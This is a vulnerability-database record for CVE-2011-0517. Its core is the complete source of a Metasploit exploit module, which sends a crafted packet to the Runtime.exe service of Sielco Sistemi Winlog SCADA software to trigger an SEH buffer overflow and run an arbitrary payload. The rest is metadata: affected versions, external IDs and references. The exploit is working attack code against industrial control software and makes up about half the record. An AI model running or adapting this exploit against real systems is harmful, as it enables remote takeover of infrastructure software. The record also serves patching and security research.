ID
VAR-E-201101-0440
CVE
| cve_id: | CVE-2011-0517 | Trust: 2.4 |
EDB ID
17430
TITLE
Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit). CVE-2011-0517CVE-70418 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sielco | model: | sistemi winlog | scope: | - | version: | - | Trust: 1.5 |
| vendor: | sielco | model: | sistemi winlog pro | scope: | eq | version: | 2.7 | Trust: 0.3 |
| vendor: | sielco | model: | sistemi winlog pro | scope: | ne | version: | 2.7.1 | Trust: 0.3 |
EXPLOIT
##
# $Id: winlog_runtime.rb 13000 2011-06-21 22:42:53Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Sielco
Sistem Winlog <= 2.07.00. When sending a specially formatted
packet to the Runtime.exe service, an attacker may be able to
execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13000 $',
'References' =>
[
[ 'CVE', '2011-0517' ],
[ 'OSVDB', '70418'],
[ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 13 2011'))
register_options([Opt::RPORT(46823)], self.class)
end
def exploit
connect
data = [0x02].pack('C') # opcode
data << [0x0101].pack('n')
data << rand_text_alpha_upper(588)
data << generate_seh_payload(target.ret)
print_status("Trying target #{target.name}...")
sock.put(data)
handler
disconnect
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Buffer Overflow (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-0517 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 17430 | Trust: 1.6 |
| db: | EDBNET | id: | 40020 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 102516 | Trust: 0.5 |
| db: | BID | id: | 45813 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-0517 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/17430/ | Trust: 0.6 |
| url: | http://www.sielcosistemi.com/en/products/winlog_scada_hmi/ | Trust: 0.3 |
| url: | http://aluigi.altervista.org/adv/winlog_1-adv.txt | Trust: 0.3 |
SOURCES
| db: | BID | id: | 45813 |
| db: | PACKETSTORM | id: | 102516 |
| db: | EXPLOIT-DB | id: | 17430 |
| db: | EDBNET | id: | 40020 |
LAST UPDATE DATE
2022-07-27T09:33:16.024000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 45813 | date: | 2015-03-19T09:45:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 45813 | date: | 2011-01-14T00:00:00 |
| db: | PACKETSTORM | id: | 102516 | date: | 2011-06-23T06:27:04 |
| db: | EXPLOIT-DB | id: | 17430 | date: | 2011-06-21T00:00:00 |
| db: | EDBNET | id: | 40020 | date: | 2011-06-21T00:00:00 |